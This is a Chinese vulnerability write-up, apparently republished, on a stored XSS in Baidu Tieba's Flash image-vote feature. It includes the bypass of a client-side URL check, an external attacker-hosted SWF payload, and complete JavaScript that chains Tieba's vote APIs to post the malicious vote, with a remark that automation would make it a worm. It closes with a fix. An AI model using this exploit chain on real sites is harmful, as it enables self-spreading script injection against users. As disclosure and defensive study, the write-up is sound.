由于是帖子正文的存储型Xss,自动触发,可蠕虫,危害你们比俺清楚。 发现流程如下: 1. 平时有事没事的时候,就会去自己的gainover吧测试一下。 2. 今天晚上又去了,一直还没用过投票功能咧,就进去看了下。 3. 发现有一个图片投票的功能,于是就随便弄了3个图,发布了一下。 4. 发布之后,发现这个投票,是Flash做的。 5. 既然图片是在Flash里加载的,那么肯定是用的Loader类来加载外部图片URL实现的了。 6. 直觉告诉我,这里可能存在一处安全问题。 7. 这里存在安全问题需要满足几个条件,A. 投票的flash允许执行脚本,即allowscriptaccess需为samedomain/未设置/always,但是投票的flash文件与百度贴吧不同域,因为allowscriptacess必须为always。B. flash里未对外部加载的URL内容进行判断 8. F12 打开调试工具,可以看到我们运气真好,allowscriptaccess是always,希望就在前方。 9. 接着我们再次去发表投票的位置,将其中一个图片地址改为http://xsst.sinaapp.com/Xjs.swf#.gif, 提交的时候,提示如下: 10. 但是,抓包不难看出,这种验证仅仅是客户端的验证。我们修改请求数据,很容易就成功绕过了。 11. 用抓包工具,查看我们生成的投票。可以看见,确实调用了我们的flash文件。 http://static.tieba.baidu.com/tb/flash/vote.swf?r=166486139965bce7156bc36762bb2c3edf&voteId=0e1e9a0f95d922fc978c0adf&tn=ajaxCanVote&stamp=1339767810003 进一步用以下代码在本地进行模拟 (例如:http://localhost/tieba.htm)。 <embed src="http://static.tieba.baidu.com/tb/flash/vote.swf?r=166486139965bce7156bc36762bb2c3edf&voteId=0e1e9a0f95d922fc978c0adf&tn=ajaxCanVote&stamp=1339767810003" allowscriptaccess="always" type="application/x-shockwave-flash"></embed> 成功弹窗。 www.2cto.com 12. 综上,我们在7 里所说的2个条件,此处均满足,也就意味着,确实存在安全问题。 -------------------- 漏洞 利用篇------------------------- 上面是分析过程,下面为了方便我们对此漏洞的利用,我们对投票过程加以分析。可以得到以下流程。 1. 添加一个投票:POST http://tieba.baidu.com/vote/commit/add_vote?alt=json 2. 获取贴吧tbs: GET http://tieba.baidu.com/dc/common/tbs?t=0.7085538243409246 3. 发表一个投票贴: POST http://tieba.baidu.com/f/commit/vote/add 4. 关联投票与投票贴:POST http://tieba.baidu.com/vote/commit/add_vote_relation?alt=json 基于以上步骤,我拿js写了一个简单的发帖工具: <textarea id="t" style="width:100%;height:150px"></textarea> <input type="button" value="Post a Xss vote" onclick="ok()" /> <script type="text/javascript"> var config={ "kw":"gainover", "id":"751341", "title":"Just test for fun" }; //添加一个投票 function addVote (){ $("t").value+="添加投票中....\n"; Net.post("http://tieba.baidu.com/vote/commit/add_vote?alt=json",{ "product_name":"forum", "title":config.title, "expire_time":"2012-06-22 21:18:44", "item_type":"1", "max_select_num":"1", "perm":"0", "attr_key_1":"forum_name", "attr_value_1":config.kw, "attr_key_2":"forum_id", "attr_value_2":config.id, //gainover吧 "item_title_1":"vote 1:"+$R(6,"ns"), "item_content_1":"http://xsst.sinaapp.com/Xjs.swf#1.gif", "item_title_2":"vote 2:"+$R(6,"ns"), "item_content_2":"http://imgsrc.baidu.com/forum/pic/item/b9d3efb1c21a60589a50274f.jpg", "item_title_3":"vote 3:"+$R(6,"ns"), "item_content_3":"http://imgsrc.baidu.com/forum/pic/item/b9d3efb1c21a60589a50274f.jpg", "ie":"utf-8" },function(rs){ $("t").value+="添加投票成功\n"; var vid=rs.vote_id; var sid=rs.sign_id; getTBS(function(rs){ addVotePost(rs.tbs,vid,sid); }); },"json"); } //获得tbs function getTBS (callback){ $("t").value+="获取tbs参数....\n"; Net.get("http://tieba.baidu.com/dc/common/tbs?t="+Math.random(),function(rs){ $("t").value+="添加tbs参数成功\n"; if(callback){ callback(rs); } },"json"); } //添加一个投票贴 function addVotePost (tbs,vid,sid){ $("t").value+="发表投票贴中....\n"; Net.post("http://tieba.baidu.com/f/commit/vote/add",{ "kw":config.kw, "title":config.title, "content":"", "tid":"0", "floor_num":"0", "anonymous":"", "rich_text":"", "pic_url":"", "sign_id":"", " vc ode":"", "fid":config.id, "vid_md5":vid+","+sid, "vcode_md5":"", "ie":"utf-8", "tbs":tbs },function(rs){ if(rs.no==0&&rs.error==""){ $("t").value+="发表带Xss的投票贴成功\n"; addVoteRelation(rs.data.tid,vid,sid); }else{ $("t").value+="addVotePost("+tbs+","+vid+","+sid+") 出错\n"; } },"json"); } //将投票贴与投票关联 function addVoteRelation (tid,vid,sid){ //thread_id,vote_id,sign_id Net.post("http://tieba.baidu.com/vote/commit/add_vote_relation?alt=json",{ "product_name":"forum", "id_1":tid, "id_2":config.id, "vote_id":vid, "sign_id":sid, "ie":"utf-8", "_":"" },function(rs){ $("t").value+="Complete, it's OK!!!"; },"json"); } function ok (){ $("t").value=""; addVote(); } </script> 当然以上过程,修改为自动化的话,就变蠕虫啦,这里我只是给出一个本地点击一下按钮,即可发布一篇带有Xss的投票贴的演示。 ----------------------------------------- 效果见漏洞证明! 漏洞证明:见:http://tieba.baidu.com/p/1665378430 (为了安全考虑,帖子会自动加载我的no.js,但是no.js里的代码已经被我删掉,因而不会有弹窗。) 下面是我截的弹窗图 --------------------------- --------------------------- 抓包加载图 --------------------------- --------------------------- 调试工具节点图 --------------------------- 修复方案: 我想,这个投票只是个投票请求,应该不需要FLASH与js的交互吧,因而将投票的flash的allowscriptaccess参数改为never是最简单的解决办法 作者:gainover
查看更多关于百度贴吧存储型XSS - 网站安全 - 自学php的详细内容...